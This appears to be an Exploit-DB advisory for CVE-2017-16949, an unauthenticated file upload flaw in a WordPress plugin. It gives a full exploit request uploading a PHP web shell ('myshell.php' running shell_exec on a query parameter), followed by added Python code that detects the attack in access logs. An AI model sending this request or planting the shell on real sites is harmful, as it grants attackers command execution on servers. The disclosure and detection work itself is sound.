Accesspress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload

EDB-ID: 43324
Author: Colette Chamberland
Published: 2017-12-12
CVE: CVE-2017-16949
Type: Webapps
Platform: PHP
Vulnerable App: N/A

# Date: November 12, 2017
# Exploit Author: Colette Chamberland
# Author contact: [email protected]
# Author homepage:
# Vendor Homepage:
# Software Link:
# Version: < 3.2.0
# Tested on: WordPress 4.x
# CVE : CVE-2017-16949

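Improper sanitization allows an unauthenticated attacker to override the plugin's settings for allowed file extensions and
upload file size through request parameters (allowedExtensions[] and sizeLimit in the request below). This allows the attacker
to upload anything they want, bypassing the filters.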


POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6;
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
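
Detection example for the request above, added here and not part of the original advisory: it scans web-server access logs for calls to the ap_file_upload_action endpoint that carry allowedExtensions or sizeLimit in the query string. The combined log format and the sample lines are assumptions; parameters sent in the POST body do not appear in access logs and are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

UPLOAD_ACTION = "ap_file_upload_action"           # action name from the request on this page
OVERRIDE_KEYS = {"allowedExtensions", "sizeLimit"}  # settings a client should never supply


def override_params(target):
    """Return the sorted override parameter names in an upload request's query string, or []."""
    parts = urlsplit(target)
    # endswith() also covers WordPress installed in a subdirectory
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # decodes %5B%5D to []
    if not any(k == "action" and v == UPLOAD_ACTION for k, v in pairs):
        return []
    # PHP treats name[] and name[0] as the same array parameter, so compare the base name
    return sorted({k for k, _ in pairs if k.split("[", 1)[0] in OVERRIDE_KEYS})


def scan(lines):
    """Yield (line_number, client_ip, params) for each log line that carries an override."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = override_params(match.group("target"))
        if params:
            yield number, line.split(" ", 1)[0], params


# Constructed sample log lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Nov/2017:10:00:01 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=ap_file_upload_action&file_uploader_nonce=abc123 HTTP/1.1" 200 85',
    '203.0.113.9 - - [12/Nov/2017:10:00:05 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=ap_file_upload_action&file_uploader_nonce=abc123'
    '&allowedExtensions%5B%5D=php&sizeLimit=64000 HTTP/1.1" 200 85',
    '198.51.100.7 - - [12/Nov/2017:10:00:09 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat&sizeLimit=1 HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for number, client, params in scan(SAMPLE_LOG):
        print(f"line {number}: {client} supplied {', '.join(params)}")
```

A legitimate upload through the plugin's form (first sample line) is not flagged; only requests that try to set the extension list or size limit themselves are reported.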

